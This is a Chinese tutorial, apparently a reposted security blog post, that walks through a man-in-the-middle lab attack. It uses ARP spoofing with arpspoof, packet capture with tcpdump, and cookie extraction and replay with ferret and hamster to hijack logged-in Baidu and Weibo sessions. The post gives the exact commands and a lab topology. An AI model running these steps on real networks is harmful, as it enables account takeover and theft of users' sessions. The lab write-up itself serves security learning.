• 中间人攻击之劫持登录会话(cookies)


    关于中间人攻击

    中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"

    因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

    视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws

    注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用

    关于抓取cookies的手记

    要echo下,实现流量的转发,要不目标是上不了网的。

    arpspoof 进行arp欺骗

    首先抓取包wireshark:选择本地网卡eth0,star抓取流量。

    这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。

    用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp

    重写之后生产hamster.txt

    这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了

    user。qonze你懂得

    0×00

    用到的工具是arpspoof tcpdump ferret hamster。

    arpspoof 进行ARP欺骗

    tcpdump抓去打到本地的数据包

    Ferret用来处理抓下来的数据包的

    Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

    0×01

    拓扑环境:

    攻击机:Kali 192.168.1.120

        

    受害机:Windows7 192.168.1.100

        

    网关:192.168.1.1

    0×02

        我的几个社区帐号都是登录状态,当然未登录也是可以劫持的

        

        

        

    先看下我在Kali的机器上是未登录的    

     

        

        

    0×03

    开始arp欺骗

      

    命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

    0×04

        捕获数据包

            

    命令:tcpdump -i eth0 -w cookie.cap

    0×05

    模拟受害者登录

    受害者在受害机器上就随便刷新一下或者登录一下

    完毕

    下面我们开始重点

    0×06

    处理抓去的数据包

    ferret -r cookie.cap

    自动生成了 hamster.txt

      

    0×07

    开启hamster服务

          

    0×08

    打开浏览器,使用代理

    0×09

    打开hamster 浏览器输入http://hamster

        

    选择目标

        

    0x0A    

    找敏感地址

       

    0x0B

    百度劫持成功

       

    微博劫持成功

        

    都成功了

        

       

    0x0C

    我在实验的时候碰见一个问题,就是突然上不到网

    下面教大家解决

    编辑/etc/NetworkManager/NetworkManager.conf

        

    vi /etc/NetworkManager/NetworkManager.conf

    改成true后保存

        

    service network-manager restart

    重启服务 

  • 相关阅读:
    怎么查看keras 或者 tensorflow 正在使用的GPU
    tf.layers.Dense与 tf.layers.dense的区别
    pytorch LSTM 简单形式
    JN_0025:在局域网中调试本地loaclhost项目
    JN_0024:浏览器打开弹窗
    JN_0023:谷歌浏览器启动项设置
    H5_0041:定义方法获取URL参数
    H5_0040:iframe 父子页面方法调用
    H5_0039:iframe 页面嵌套格式 安全选项sandbox
    Web_0008:win系统默认80端口被占用的处理方法
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154676.html
Copyright © 2020-2023  润新知